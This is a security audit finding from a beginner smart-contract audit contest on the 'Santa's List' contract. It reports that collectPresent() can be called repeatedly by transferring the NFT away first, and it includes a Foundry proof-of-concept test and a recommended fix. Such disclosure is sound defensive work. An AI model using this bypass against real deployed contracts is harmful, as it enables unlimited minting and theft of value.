First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Can collect present multi-time with only a address

0xfuluz

Summary

Attacker can collect presents many time without limit with only one valid address.

Vulnerability Details

function collectPresent() limit user only collect 1 time with 1 valid address with condition check balance of address : if (balanceOf(msg.sender) > 0) , but attacker can bypass easy by send token to another address before call collectPresent() again.

Test code for POC:

unction testCanCollectPresentAfterAlreadyCollected() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
// transfer nft to user2
santasList.safeTransferFrom(user, user2, 0);
// collect present again
santasList.collectPresent();
// transfer nft to user2
santasList.safeTransferFrom(user, user2, 1);
// collect present again
santasList.collectPresent();
}

Impact

Attacker can mint unlimit amount nft santasList and santasToken

Tools Used

Manual Review & Foundry

Recommendations

Implement a mapping address with status collected to record that address have call collectPresent() or not, ex: mapping(address => bool) collectedPreson

Updates

Lead Judging Commences

inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!